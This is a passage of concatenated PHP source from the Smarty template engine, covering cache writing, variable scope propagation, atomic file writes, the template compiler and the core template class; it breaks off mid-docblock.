        if (!$no_output_filter && !$_template->cached->has_nocache_code
            && (isset($_template->smarty->autoload_filters[ 'output' ])
                || isset($_template->smarty->registered_filters[ 'output' ]))
        ) {
            $content = $_template->smarty->ext->_filterHandler->runFilter('output', $content, $_template);
        }
        // write cache file content
        $this->writeCachedContent($_template, $content);
    }

    /**
     * Writes the content to cache resource
     *
     * @param Smarty_Internal_Template $_template
     * @param string                   $content
     *
     * @return bool
     */
    public function writeCachedContent(Smarty_Internal_Template $_template, $content)
    {
        if ($_template->source->handler->recompiled || !$_template->caching
        ) {
            // don't write cache file
            return false;
        }
        if (!isset($_template->cached)) {
            $_template->loadCached();
        }
        $content = $_template->smarty->ext->_codeFrame->create($_template, $content, '', true);
        return $this->write($_template, $content);
    }

    /**
     * Write this cache object to handler
     *
     * @param Smarty_Internal_Template $_template template object
     * @param string                   $content   content to cache
     *
     * @return bool success
     */
    public function write(Smarty_Internal_Template $_template, $content)
    {
        if (!$_template->source->handler->recompiled) {
            $cached = $_template->cached;
            if ($cached->handler->writeCachedContent($_template, $content)) {
                $cached->content = null;
                $cached->timestamp = time();
                $cached->exists = true;
                $cached->valid = true;
                $cached->cache_lifetime = $_template->cache_lifetime;
                $cached->processed = false;
                if ($_template->smarty->cache_locking) {
                    $cached->handler->releaseLock($_template->smarty, $cached);
                }
                return true;
            }
            $cached->content = null;
            $cached->timestamp = false;
            $cached->exists = false;
            $cached->valid = false;
            $cached->processed = false;
        }
        return false;
    }
}
<?php

/**
 * Runtime Extension updateScope
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 **/
class Smarty_Internal_Runtime_UpdateScope
{
    /**
     * Update new assigned template or config variable in other effected scopes
     *
     * @param Smarty_Internal_Template $tpl      data object
     * @param string|null              $varName  variable name
     * @param int                      $tagScope tag scope to which bubble up variable value
     */
    public function _updateScope(Smarty_Internal_Template $tpl, $varName, $tagScope = 0)
    {
        if ($tagScope) {
            $this->_updateVarStack($tpl, $varName);
            $tagScope = $tagScope & ~Smarty::SCOPE_LOCAL;
            if (!$tpl->scope && !$tagScope) {
                return;
            }
        }
        $mergedScope = $tagScope | $tpl->scope;
        if ($mergedScope) {
            if ($mergedScope & Smarty::SCOPE_GLOBAL && $varName) {
                Smarty::$global_tpl_vars[ $varName ] = $tpl->tpl_vars[ $varName ];
            }
            // update scopes
            foreach ($this->_getAffectedScopes($tpl, $mergedScope) as $ptr) {
                $this->_updateVariableInOtherScope($ptr->tpl_vars, $tpl, $varName);
                if ($tagScope && $ptr->_isTplObj() && isset($tpl->_cache[ 'varStack' ])) {
                    $this->_updateVarStack($ptr, $varName);
                }
            }
        }
    }

    /**
     * Get array of objects which needs to be updated  by given scope value
     *
     * @param Smarty_Internal_Template $tpl
     * @param int                      $mergedScope merged tag and template scope to which bubble up variable value
     *
     * @return array
     */
    public function _getAffectedScopes(Smarty_Internal_Template $tpl, $mergedScope)
    {
        $_stack = array();
        $ptr = $tpl->parent;
        if ($mergedScope && isset($ptr) && $ptr->_isTplObj()) {
            $_stack[] = $ptr;
            $mergedScope = $mergedScope & ~Smarty::SCOPE_PARENT;
            if (!$mergedScope) {
                // only parent was set, we are done
                return $_stack;
            }
            $ptr = $ptr->parent;
        }
        while (isset($ptr) && $ptr->_isTplObj()) {
            $_stack[] = $ptr;
            $ptr = $ptr->parent;
        }
        if ($mergedScope & Smarty::SCOPE_SMARTY) {
            if (isset($tpl->smarty)) {
                $_stack[] = $tpl->smarty;
            }
        } elseif ($mergedScope & Smarty::SCOPE_ROOT) {
            while (isset($ptr)) {
                if (!$ptr->_isTplObj()) {
                    $_stack[] = $ptr;
                    break;
                }
                $ptr = $ptr->parent;
            }
        }
        return $_stack;
    }

    /**
     * Update variable in other scope
     *
     * @param array                     $tpl_vars template variable array
     * @param \Smarty_Internal_Template $from
     * @param string                    $varName  variable name
     */
    public function _updateVariableInOtherScope(&$tpl_vars, Smarty_Internal_Template $from, $varName)
    {
        if (!isset($tpl_vars[ $varName ])) {
            $tpl_vars[ $varName ] = clone $from->tpl_vars[ $varName ];
        } else {
            $tpl_vars[ $varName ] = clone $tpl_vars[ $varName ];
            $tpl_vars[ $varName ]->value = $from->tpl_vars[ $varName ]->value;
        }
    }

    /**
     * Update variable in template local variable stack
     *
     * @param \Smarty_Internal_Template $tpl
     * @param string|null               $varName variable name or null for config variables
     */
    public function _updateVarStack(Smarty_Internal_Template $tpl, $varName)
    {
        $i = 0;
        while (isset($tpl->_cache[ 'varStack' ][ $i ])) {
            $this->_updateVariableInOtherScope($tpl->_cache[ 'varStack' ][ $i ][ 'tpl' ], $tpl, $varName);
            $i++;
        }
    }
}
<?php
/**
 * Smarty write file plugin
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Monte Ohrt
 */

/**
 * Smarty Internal Write File Class
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 */
class Smarty_Internal_Runtime_WriteFile
{
    /**
     * Writes file in a safe way to disk
     *
     * @param string $_filepath complete filepath
     * @param string $_contents file content
     * @param Smarty $smarty    smarty instance
     *
     * @throws SmartyException
     * @return boolean true
     */
    public function writeFile($_filepath, $_contents, Smarty $smarty)
    {
        $_error_reporting = error_reporting();
        error_reporting($_error_reporting & ~E_NOTICE & ~E_WARNING);
        $_dirpath = dirname($_filepath);
        // if subdirs, create dir structure
        if ($_dirpath !== '.') {
            $i = 0;
            // loop if concurrency problem occurs
            // see https://bugs.php.net/bug.php?id=35326
            while (!is_dir($_dirpath)) {
                if (@mkdir($_dirpath, 0777, true)) {
                    break;
                }
                clearstatcache();
                if (++$i === 3) {
                    error_reporting($_error_reporting);
                    throw new SmartyException("unable to create directory {$_dirpath}");
                }
                sleep(1);
            }
        }
        // write to tmp file, then move to overt file lock race condition
        $_tmp_file = $_dirpath . DIRECTORY_SEPARATOR . str_replace(array('.', ','), '_', uniqid('wrt', true));
        if (!file_put_contents($_tmp_file, $_contents)) {
            error_reporting($_error_reporting);
            throw new SmartyException("unable to write file {$_tmp_file}");
        }
        /*
         * Windows' rename() fails if the destination exists,
         * Linux' rename() properly handles the overwrite.
         * Simply unlink()ing a file might cause other processes
         * currently reading that file to fail, but linux' rename()
         * seems to be smart enough to handle that for us.
         */
        if (Smarty::$_IS_WINDOWS) {
            // remove original file
            if (is_file($_filepath)) {
                @unlink($_filepath);
            }
            // rename tmp file
            $success = @rename($_tmp_file, $_filepath);
        } else {
            // rename tmp file
            $success = @rename($_tmp_file, $_filepath);
            if (!$success) {
                // remove original file
                if (is_file($_filepath)) {
                    @unlink($_filepath);
                }
                // rename tmp file
                $success = @rename($_tmp_file, $_filepath);
            }
        }
        if (!$success) {
            error_reporting($_error_reporting);
            throw new SmartyException("unable to write file {$_filepath}");
        }
        // set file permissions
        @chmod($_filepath, 0666 & ~umask());
        error_reporting($_error_reporting);
        return true;
    }
}
<?php
/**
 * Smarty Internal Plugin Smarty Template Compiler Base
 * This file contains the basic classes and methods for compiling Smarty templates with lexer/parser
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Class SmartyTemplateCompiler
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_SmartyTemplateCompiler extends Smarty_Internal_TemplateCompilerBase
{
    /**
     * Lexer class name
     *
     * @var string
     */
    public $lexer_class;

    /**
     * Parser class name
     *
     * @var string
     */
    public $parser_class;

    /**
     * array of vars which can be compiled in local scope
     *
     * @var array
     */
    public $local_var = array();

    /**
     * array of callbacks called when the normal compile process of template is finished
     *
     * @var array
     */
    public $postCompileCallbacks = array();

    /**
     * prefix code
     *
     * @var string
     */
    public $prefixCompiledCode = '';

    /**
     * postfix code
     *
     * @var string
     */
    public $postfixCompiledCode = '';

    /**
     * Initialize compiler
     *
     * @param string $lexer_class  class name
     * @param string $parser_class class name
     * @param Smarty $smarty       global instance
     */
    public function __construct($lexer_class, $parser_class, Smarty $smarty)
    {
        parent::__construct($smarty);
        // get required plugins
        $this->lexer_class = $lexer_class;
        $this->parser_class = $parser_class;
    }

    /**
     * method to compile a Smarty template
     *
     * @param mixed $_content template source
     * @param bool  $isTemplateSource
     *
     * @return bool true if compiling succeeded, false if it failed
     * @throws \SmartyCompilerException
     */
    protected function doCompile($_content, $isTemplateSource = false)
    {
        /* here is where the compiling takes place. Smarty
          tags in the templates are replaces with PHP code,
          then written to compiled files. */
        // init the lexer/parser to compile the template
        $this->parser =
            new $this->parser_class(
                new $this->lexer_class(
                    str_replace(
                        array(
                            "\r\n",
                            "\r"
                        ),
                        "\n",
                        $_content
                    ),
                    $this
                ),
                $this
            );
        if ($isTemplateSource && $this->template->caching) {
            $this->parser->insertPhpCode("<?php\n\$_smarty_tpl->compiled->nocache_hash = '{$this->nocache_hash}';\n?>\n");
        }
        if (function_exists('mb_internal_encoding')
            && function_exists('ini_get')
            && ((int)ini_get('mbstring.func_overload')) & 2
        ) {
            $mbEncoding = mb_internal_encoding();
            mb_internal_encoding('ASCII');
        } else {
            $mbEncoding = null;
        }
        if ($this->smarty->_parserdebug) {
            $this->parser->PrintTrace();
            $this->parser->lex->PrintTrace();
        }
        // get tokens from lexer and parse them
        while ($this->parser->lex->yylex()) {
            if ($this->smarty->_parserdebug) {
                echo "<pre>Line {$this->parser->lex->line} Parsing  {$this->parser->yyTokenName[$this->parser->lex->token]} Token " .
                     htmlentities($this->parser->lex->value) . "</pre>";
            }
            $this->parser->doParse($this->parser->lex->token, $this->parser->lex->value);
        }
        // finish parsing process
        $this->parser->doParse(0, 0);
        if ($mbEncoding) {
            mb_internal_encoding($mbEncoding);
        }
        // check for unclosed tags
        if (count($this->_tag_stack) > 0) {
            // get stacked info
            list($openTag, $_data) = array_pop($this->_tag_stack);
            $this->trigger_template_error(
                "unclosed {$this->smarty->left_delimiter}" . $openTag .
                "{$this->smarty->right_delimiter} tag"
            );
        }
        // call post compile callbacks
        foreach ($this->postCompileCallbacks as $cb) {
            $parameter = $cb;
            $parameter[ 0 ] = $this;
            call_user_func_array($cb[ 0 ], $parameter);
        }
        // return compiled code
        return $this->prefixCompiledCode . $this->parser->retvalue . $this->postfixCompiledCode;
    }

    /**
     * Register a post compile callback
     * - when the callback is called after template compiling the compiler object will be inserted as first parameter
     *
     * @param callback $callback
     * @param array    $parameter optional parameter array
     * @param string   $key       optional key for callback
     * @param bool     $replace   if true replace existing keyed callback
     */
    public function registerPostCompileCallback($callback, $parameter = array(), $key = null, $replace = false)
    {
        array_unshift($parameter, $callback);
        if (isset($key)) {
            if ($replace || !isset($this->postCompileCallbacks[ $key ])) {
                $this->postCompileCallbacks[ $key ] = $parameter;
            }
        } else {
            $this->postCompileCallbacks[] = $parameter;
        }
    }

    /**
     * Remove a post compile callback
     *
     * @param string $key callback key
     */
    public function unregisterPostCompileCallback($key)
    {
        unset($this->postCompileCallbacks[ $key ]);
    }
}
<?php
/**
 * Smarty Internal Plugin Template
 * This file contains the Smarty template engine
 *
 * @package    Smarty
 * @subpackage Template
 * @author     Uwe Tews
 */

/**
 * Main class with template data structures and methods
 *
 * @package    Smarty
 * @subpackage Template
 *
 * @property Smarty_Template_Compiled             $compiled
 * @property Smarty_Template_Cached               $cached
 * @property Smarty_Internal_TemplateCompilerBase $compiler
 * @property mixed|\Smarty_Template_Cached        registered_plugins
 *
 * The following methods will be dynamically loaded by the extension handler when they are called.
 * They are located in a corresponding Smarty_Internal_Method_xxxx class
 *
 * @method bool mustCompile()
 */
#[\AllowDynamicProperties]
class Smarty_Internal_Template extends Smarty_Internal_TemplateBase
{
    /**
     * Template object cache
     *
     * @var Smarty_Internal_Template[]
     */
    public static $tplObjCache = array();

    /**
     * Template object cache for Smarty::isCached() === true
     *
     * @var Smarty_Internal_Template[]
     */
    public static $isCacheTplObj = array();

    /**
     * Sub template Info Cache
     * - index name
     * - value use count
     *
     * @var int[]
     */
    public static $subTplInfo = array();

    /**
     * This object type (Smarty = 1, template = 2, data = 4)
     *
     * @var int
     */
    public $_objType = 2;

    /**
     * Global smarty instance
     *
     * @var Smarty
     */
    public $smarty = null;

    /**
     * Source instance
     *
     * @var Smarty_Template_Source|Smarty_Template_Config
     */
    public $source = null;

    /**
     * Inheritance runtime extension
     *
     * @var Smarty_Internal_Runtime_Inheritance
     */
    public $inheritance = null;

    /**
     * Template resource
     *
     * @var string
     */
    public $template_resource = null;

    /**
     * flag if compiled template is invalid and must be (re)compiled
     *
     * @var bool
     */
    public $mustCompile = null;

    /**
     * Template Id
     *
     * @var null|string
     */
    public $templateId = null;

    /**
     * Scope in which variables shall be assigned
     *
     * @var int
     */
    public $scope = 0;

    /**
     * Flag which is set while rending a cache file
     *
     * @var bool
     */
    public $isRenderingCache = false;

    /**
     * Callbacks called before rendering template
     *
     * @var callback[]
     */
    public $startRenderCallbacks = array();

    /**
     * Callbacks called after rendering template
     *
     * @var callback[]
     */
    public $endRenderCallbacks = array();

    /**
     * Create template data object
     * Some of the global Smarty settings copied to template scope
     * It load the required template resources and caching plugins
     *
     * @param string                                                       $template_resource template resource string
     * @param Smarty                                                       $smarty            Smarty instance
     * @param null|\Smarty_Internal_Template|\Smarty|\Smarty_Internal_Data $_parent           back pointer to parent
     *                                                                                        object with variables or
     *                                                                                        null
     * @param mixed                                                        $_cache_id         cache   id or null
     * @param mixed                                                        $_compile_id       compile id or null
     * @param bool|int|null                                                $_caching          use caching?
     * @param int|null                                                     $_cache_lifetime   cache life-time in
     *                                                                                        seconds
     * @param bool                                                         $_isConfig
     *
     * @throws \SmartyException
     */
    public function __construct(
        $template_resource,
        Smarty $smarty,
        ?Smarty_Internal_Data $_parent = null,
        $_cache_id = null,
        $_compile_id = null,
        $_caching = null,
        $_cache_lifetime = null,
        $_isConfig = false
    ) {
        $this->smarty = $smarty;
        // Smarty parameter
        $this->cache_id = $_cache_id === null ? $this->smarty->cache_id : $_cache_id;
        $this->compile_id = $_compile_id === null ? $this->smarty->compile_id : $_compile_id;
        $this->caching = (int)($_caching === null ? $this->smarty->caching : $_caching);
        $this->cache_lifetime = $_cache_lifetime === null ? $this->smarty->cache_lifetime : $_cache_lifetime;
        $this->compile_check = (int)$smarty->compile_check;
        $this->parent = $_parent;
        // Template resource
        $this->template_resource = $template_resource;
        $this->source = $_isConfig ? Smarty_Template_Config::load($this) : Smarty_Template_Source::load($this);
        parent::__construct();
        if ($smarty->security_policy && method_exists($smarty->security_policy, 'registerCallBacks')) {
            $smarty->security_policy->registerCallBacks($this);
        }
    }

    /**
     * render template
     *
     * @param bool      $no_output_filter if true do not run output filter
     * @param null|bool $display          true: display, false: fetch null: sub-template
     *
     * @return string
     * @throws \Exception
     * @throws \SmartyException
     */
    public function render($no_output_filter = true, $display = null)
    {
        if ($this->smarty->debugging) {
            if (!isset($this->smarty->_debug)) {
                $this->smarty->_debug = new Smarty_Internal_Debug();
            }
            $this->smarty->_debug->start_template($this, $display);
        }
        // checks if template exists
        if (!$this->source->exists) {
            throw new SmartyException(
                "Unable to load template '{$this->source->type}:{$this->source->name}'" .
                ($this->_isSubTpl() ? " in '{$this->parent->template_resource}'" : '')
            );
        }
        // disable caching for evaluated code
        if ($this->source->handler->recompiled) {
            $this->caching = Smarty::CACHING_OFF;
        }
        // read from cache or render
        if ($this->caching === Smarty::CACHING_LIFETIME_CURRENT || $this->caching === Smarty::CACHING_LIFETIME_SAVED) {
            if (!isset($this->cached) || $this->cached->cache_id !== $this->cache_id
                || $this->cached->compile_id !== $this->compile_id
            ) {
                $this->loadCached(true);
            }
            $this->cached->render($this, $no_output_filter);
        } else {
            if (!isset($this->compiled) || $this->compiled->compile_id !== $this->compile_id) {
                $this->loadCompiled(true);
            }
            $this->compiled->render($this);
        }
        // display or fetch
        if ($display) {
            if ($this->caching && $this->smarty->cache_modified_check) {
                $this->smarty->ext->_cacheModify->cacheModifiedCheck(
                    $this->cached,
                    $this,
                    isset($content) ? $content : ob_get_clean()
                );
            } else {
                if ((!$this->caching || $this->cached->has_nocache_code || $this->source->handler->recompiled)
                    && !$no_output_filter && (isset($this->smarty->autoload_filters[ 'output' ])
                                              || isset($this->smarty->registered_filters[ 'output' ]))
                ) {
                    echo $this->smarty->ext->_filterHandler->runFilter('output', ob_get_clean(), $this);
                } else {
                    echo ob_get_clean();
                }
            }
            if ($this->smarty->debugging) {
                $this->smarty->_debug->end_template($this);
                // debug output
                $this->smarty->_debug->display_debug($this, true);
            }
            return '';
        } else {
            if ($this->smarty->debugging) {
                $this->smarty->_debug->end_template($this);
                if ($this->smarty->debugging === 2 && $display === false) {
                    $this->smarty->_debug->display_debug($this, true);
                }
            }
            if (!$no_output_filter
                && (!$this->caching || $this->cached->has_nocache_code || $this->source->handler->recompiled)
                && (isset($this->smarty->autoload_filters[ 'output' ])
                    || isset($this->smarty->registered_filters[ 'output' ]))
            ) {
                return $this->smarty->ext->_filterHandler->runFilter('output', ob_get_clean(), $this);
            }
            // return cache content
            return null;
        }
    }

    /**
     * Runtime function to render sub-template
     *
     * @param string  $template       template name
     * @param mixed   $cache_id       cache id
     * @param mixed   $compile_id     compile id
     * @param integer $caching        cache mode
     * @param integer $cache_lifetime life time of cache data
     * @param array   $data           passed parameter template variables
     * @param int     $scope          scope in which {include} should execute
     * @param bool    $forceTplCache  cache template object
     * @param string  $uid            file dependency uid
     * @param string  $content_func   function name
     *
     * @throws \Exception
     * @throws \SmartyException
     */
    public function _subTemplateRender(
        $template,
        $cache_id,
        $compile_id,
        $caching,
        $cache_lifetime,
        $data,
        $scope,
        $forceTplCache,
        $uid = null,
        $content_func = null
    ) {
        $tpl = clone $this;
        $tpl->parent = $this;
        $smarty = &$this->smarty;
        $_templateId = $smarty->_getTemplateId($template, $cache_id, $compile_id, $caching, $tpl);
        // recursive call ?
        if ((isset($tpl->templateId) ? $tpl->templateId : $tpl->_getTemplateId()) !== $_templateId) {
            // already in template cache?
            if (isset(self::$tplObjCache[ $_templateId ])) {
                // copy data from cached object
                $cachedTpl = &self::$tplObjCache[ $_templateId ];
                $tpl->templateId = $cachedTpl->templateId;
                $tpl->template_resource = $cachedTpl->template_resource;
                $tpl->cache_id = $cachedTpl->cache_id;
                $tpl->compile_id = $cachedTpl->compile_id;
                $tpl->source = $cachedTpl->source;
                if (isset($cachedTpl->compiled)) {
                    $tpl->compiled = $cachedTpl->compiled;
                } else {
                    unset($tpl->compiled);
                }
                if ($caching !== 9999 && isset($cachedTpl->cached)) {
                    $tpl->cached = $cachedTpl->cached;
                } else {
                    unset($tpl->cached);
                }
            } else {
                $tpl->templateId = $_templateId;
                $tpl->template_resource = $template;
                $tpl->cache_id = $cache_id;
                $tpl->compile_id = $compile_id;
                if (isset($uid)) {
                    // for inline templates we can get all resource information from file dependency
                    list($filepath, $timestamp, $type) = $tpl->compiled->file_dependency[ $uid ];
                    $tpl->source = new Smarty_Template_Source($smarty, $filepath, $type, $filepath);
                    $tpl->source->filepath = $filepath;
                    $tpl->source->timestamp = $timestamp;
                    $tpl->source->exists = true;
                    $tpl->source->uid = $uid;
                } else {
                    $tpl->source = Smarty_Template_Source::load($tpl);
                    unset($tpl->compiled);
                }
                if ($caching !== 9999) {
                    unset($tpl->cached);
                }
            }
        } else {
            // on recursive calls force caching
            $forceTplCache = true;
        }
        $tpl->caching = $caching;
        $tpl->cache_lifetime = $cache_lifetime;
        // set template scope
        $tpl->scope = $scope;
        if (!isset(self::$tplObjCache[ $tpl->templateId ]) && !$tpl->source->handler->recompiled) {
            // check if template object should be cached
            if ($forceTplCache || (isset(self::$subTplInfo[ $tpl->template_resource ])
                                   && self::$subTplInfo[ $tpl->template_resource ] > 1)
                || ($tpl->_isSubTpl() && isset(self::$tplObjCache[ $tpl->parent->templateId ]))
            ) {
                self::$tplObjCache[ $tpl->templateId ] = $tpl;
            }
        }
        if (!empty($data)) {
            // set up variable values
            foreach ($data as $_key => $_val) {
                $tpl->tpl_vars[ $_key ] = new Smarty_Variable($_val, $this->isRenderingCache);
            }
        }
        if ($tpl->caching === 9999) {
            if (!isset($tpl->compiled)) {
                $tpl->loadCompiled(true);
            }
            if ($tpl->compiled->has_nocache_code) {
                $this->cached->hashes[ $tpl->compiled->nocache_hash ] = true;
            }
        }
        $tpl->_cache = array();
        if (isset($uid)) {
            if ($smarty->debugging) {
                if (!isset($smarty->_debug)) {
                    $smarty->_debug = new Smarty_Internal_Debug();
                }
                $smarty->_debug->start_template($tpl);
                $smarty->_debug->start_render($tpl);
            }
            $tpl->compiled->getRenderedTemplateCode($tpl, $content_func);
            if ($smarty->debugging) {
                $smarty->_debug->end_template($tpl);
                $smarty->_debug->end_render($tpl);
            }
        } else {
            if (isset($tpl->compiled)) {
                $tpl->compiled->render($tpl);
            } else {
                $tpl->render();
            }
        }
    }

    /**
     * Get called sub-templates and save call count
     */
    public function _subTemplateRegister()
    {
        foreach ($this->compiled->includes as $name => $count) {
            if (isset(self::$subTplInfo[ $name ])) {
                self::$subTplInfo[ $name ] += $count;
            } else {
                self::$subTplInfo[ $name ] = $count;
            }
        }
    }

    /**
     * Check if this is a sub template
     *
     * @return bool true is sub template
     */
    public function _isSubTpl()
    {
        return isset($this->parent) && $this->parent->_isTplObj();
    }

    /**
     * Assign variable in scope
     *
     * @param string $varName variable name
     * @param mixed  $value   value
     * @param bool   $nocache nocache flag
     * @param int    $scope   scope into which variable shall be assigned
     */
    public function _assignInScope($varName, $value, $nocache = false, $scope = 0)
    {
        if (isset($this->tpl_vars[ $varName ])) {
            $this->tpl_vars[ $varName ] = clone $this->tpl_vars[ $varName ];
            $this->tpl_vars[ $varName ]->value = $value;
            if ($nocache || $this->isRenderingCache) {
                $this->tpl_vars[ $varName ]->nocache = true;
            }
        } else {
            $this->tpl_vars[ $varName ] = new Smarty_Variable($value, $nocache || $this->isRenderingCache);
        }
        if ($scope >= 0) {
            if ($scope > 0 || $this->scope > 0) {
                $this->smarty->ext->_updateScope->_updateScope($this, $varName, $scope);
            }
        }
    }

    /**
     * Check if plugins are callable require file otherwise
     *
     * @param array $plugins required plugins
     *
     * @throws \SmartyException
     */
    public function _checkPlugins($plugins)
    {
        static $checked = array();
        foreach ($plugins as $plugin) {
            $name = join('::', (array)$plugin[ 'function' ]);
            if (!isset($checked[ $name ])) {
                if (!is_callable($plugin[ 'function' ])) {
                    if (is_file($plugin[ 'file' ])) {
                        include_once $plugin[ 'file' ];
                        if (is_callable($plugin[ 'function' ])) {
                            $checked[ $name ] = true;
                        }
                    }
                } else {
                    $checked[ $name ] = true;
                }
            }
            if (!isset($checked[ $name ])) {
                if (false !== $this->smarty->loadPlugin($name)) {
                    $checked[ $name ] = true;
                } else {
                    throw new SmartyException("Plugin '{$name}' not callable");
                }
            }
        }
    }

    /**
     * This function is executed automatically when a compiled or cached template file is included
     * - Decode saved properties from compiled template and cache files
     * - Check if compiled or cache file is valid
     *
     * @param \Smarty_Internal_Template $tpl
     * @param array                     $properties special template properties
     * @param bool                      $cache      flag if called from cache file
     *
     * @return bool flag if compiled or cache file is valid
     * @throws \SmartyException
     */
    public function _decodeProperties(Smarty_Internal_Template $tpl, $properties, $cache = false)
    {
        // on cache resources other than file check version stored in cache code
        if (!isset($properties[ 'version' ]) || Smarty::SMARTY_VERSION !== $properties[ 'version' ]) {
            if ($cache) {
                $tpl->smarty->clearAllCache();
            } else {
                $tpl->smarty->clearCompiledTemplate();
            }
            return false;
        }
        $is_valid = true;
        if (!empty($properties[ 'file_dependency' ])
            && ((!$cache && $tpl->compile_check) || $tpl->compile_check === Smarty::COMPILECHECK_ON)
        ) {
            // check file dependencies at compiled code
            foreach ($properties[ 'file_dependency' ] as $_file_to_check) {
                if ($_file_to_check[ 2 ] === 'file' || $_file_to_check[ 2 ] === 'php') {
                    if ($tpl->source->filepath === $_file_to_check[ 0 ]) {
                        // do not recheck current template
                        continue;
                        //$mtime = $tpl->source->getTimeStamp();
                    } else {
                        // file and php types can be checked without loading the respective resource handlers
                        $mtime = is_file($_file_to_check[ 0 ]) ? filemtime($_file_to_check[ 0 ]) : false;
                    }
                } else {
                    $handler = Smarty_Resource::load($tpl->smarty, $_file_to_check[ 2 ]);
                    if ($handler->checkTimestamps()) {
                        $source = Smarty_Template_Source::load($tpl, $tpl->smarty, $_file_to_check[ 0 ]);
                        $mtime = $source->getTimeStamp();
                    } else {
                        continue;
                    }
                }
                if ($mtime === false || $mtime > $_file_to_check[ 1 ]) {
                    $is_valid = false;
                    break;
                }
            }
        }
        if ($cache) {
            // CACHING_LIFETIME_SAVED cache expiry has to be validated here since otherwise we'd define the unifunc
            if ($tpl->caching === Smarty::CACHING_LIFETIME_SAVED && $properties[ 'cache_lifetime' ] >= 0
                && (time() > ($tpl->cached->timestamp + $properties[ 'cache_lifetime' ]))
            ) {
                $is_valid = false;
            }
            $tpl->cached->cache_lifetime = $properties[ 'cache_lifetime' ];
            $tpl->cached->valid = $is_valid;
            $resource = $tpl->cached;
        } else {
            $tpl->mustCompile = !$is_valid;
            $resource = $tpl->compiled;
            $resource->includes = isset($properties[ 'includes' ]) ? $properties[ 'includes' ] : array();
        }
        if ($is_valid) {
            $resource->unifunc = $properties[ 'unifunc' ];
            $resource->has_nocache_code = $properties[ 'has_nocache_code' ];
            //            $tpl->compiled->nocache_hash = $properties['nocache_hash'];
            $resource->file_dependency = $properties[ 'file_dependency' ];
        }
        return $is_valid && !function_exists($properties[ 'unifunc' ]);
    }

    /**
     * Compiles the template
     * If the template is not evaluated the compiled template is saved on disk
     *
     * @throws \Exception
     */
    public function compileTemplateSource()
    {
        return $this->compiled->compileTemplateSource($this);
    }

    /**
     * Writes the content to cache resource
     *
     * @param string $content
     *
     * @return bool
     */
    public function writeCachedContent($content)
    {
        return $this->smarty->ext->_updateCache->writeCachedContent($this, $content);
    }

    /**
     * Get unique template id
     *
     * @return string
     * @throws \SmartyException
     */
    public function _getTemplateId()
    {
        return isset($this->templateId) ? $this->templateId : $this->templateId =
            $this->smarty->_getTemplateId($this->template_resource, $this->cache_id, $this->compile_id);
    }

    /**
     * runtime error not matching capture tags
     *
     * @throws \SmartyException
     */
    public function capture_error()
    {
        throw new SmartyException("Not matching {capture} open/close in '{$this->template_resource}'");
    }

    /**
     * Load compiled object
     *
     * @param bool $force force new compiled object
     */
    public function loadCompiled($force = false)
    {
        if ($force || !isset($this->compiled)) {
            $this->compiled = Smarty_Template_Compiled::load($this);
        }
    }

    /**
     * Load cached object
     *
     * @param bool $force force new cached object
     */
    public function loadCached($force = false)
    {
        if ($force || !isset($this->cached)) {
            $this->cached = Smarty_Template_Cached::load($this);
        }
    }

    /**
     * Load inheritance object
     */
    public function _loadInheritance()
    {
        if (!isset($this->inheritance)) {
            $this->inheritance = new Smarty_Internal_Runtime_Inheritance();
        }
    }

    /**
     * Unload inheritance object
     */
    public function _cleanUp()
    {
        $this->startRenderCallbacks = array();
        $this->endRenderCallbacks = array();
        $this->inheritance = null;
    }

    /**
     * Load compiler object
     *
     * @throws \SmartyException
     */
    public function loadCompiler()
    {
        if (!class_exists($this->source->compiler_class)) {
            $this->smarty->loadPlugin($this->source->compiler_class);
        }
        $this->compiler =
            new $this->source->compiler_class(
                $this->source->template_lexer_class,
                $this->source->template_parser_class,
                $this->smarty
            );
    }

    /**
     * Handle unknown class methods
     *
     * @param string $name unknown method-name
     * @param array  $args argument array
     *
     * @return mixed
     */
    public function __call($name, $args)
    {
        // method of Smarty object?
        if (method_exists($this->smarty, $name)) {
            return call_user_func_array(array($this->smarty, $name), $args);
        }
        // parent
        return parent::__call($name, $args);
    }

    /**
     * get Smarty property in template context
     *
     * @param string $property_name property name
     *
     * @return mixed|Smarty_Template_Cached
     * @throws SmartyException
     */
    public function __get($property_name)
    {
        switch ($property_name) {
            case 'compiled':
                $this->loadCompiled();
                return $this->compiled;
            case 'cached':
                $this->loadCached();
                return $this->cached;
            case 'compiler':
                $this->loadCompiler();
                return $this->compiler;
            default:
                // Smarty property ?
                if (property_exists($this->smarty, $property_name)) {
                    return $this->smarty->$property_name;
                }
        }
        throw new SmartyException("template property '$property_name' does not exist.");
    }

    /**
     * set Smarty property in template context
     *
     * @param string $property_name property name
     * @param mixed  $value         value
     *
     * @throws SmartyException
     */
    public function __set($property_name, $value)
    {
        switch ($property_name) {
            case 'compiled':
            case 'cached':
            case 'compiler':
                $this->$property_name = $value;
                return;
            default:
                // Smarty property ?
                if (property_exists($this->smarty, $property_name)) {
                    $this->smarty->$property_name = $value;
                    return;
                }
        }
        throw new SmartyException("invalid template property '$property_name'.");
    }

    /**
     * Template data object destructor
     */
    public function __destruct()
    {
        if ($this->smarty->cache_locking && isset($this->cached) && $this->cached->is_locked) {
            $this->cached->handler->releaseLock($this->smarty, $this->cached);
        }
    }
}
<?php
/**
 * Smarty Internal Plugin Smarty Template  Base
 * This file contains the basic shared methods for template handling
 *
 * @package    Smarty
 * @subpackage Template
 * @author     Uwe Tews
 */

/**
 * Class with shared smarty/template methods
 *
 * @package    Smarty
 * @subpackage Template
 *
 * @property int $_objType
 *
 * The following methods will be dynamically loaded by the extension handler when they are called.
 * They are located in a corresponding Smarty_Internal_Method_xxxx class
 *
 * @method Smarty_Internal_TemplateBase addAutoloadFilters(mixed $filters, string $type = null)
 * @method Smarty_Internal_TemplateBase addDefaultModifiers(mixed $modifiers)
 * @method Smarty_Internal_TemplateBase addLiterals(mixed $literals)
 * @method Smarty_Internal_TemplateBase createData(Smarty_Internal_Data $parent = null, string $name = null)
 * @method array getAutoloadFilters(string $type = null)
 * @method string getDebugTemplate()
 * @method array getDefaultModifier()
 * @method array getLiterals()
 * @method array getTags(mixed $template = null)
 * @method object getRegisteredObject(string $object_name)
 * @method Smarty_Internal_TemplateBase registerCacheResource(string $name, Smarty_CacheResource $resource_handler)
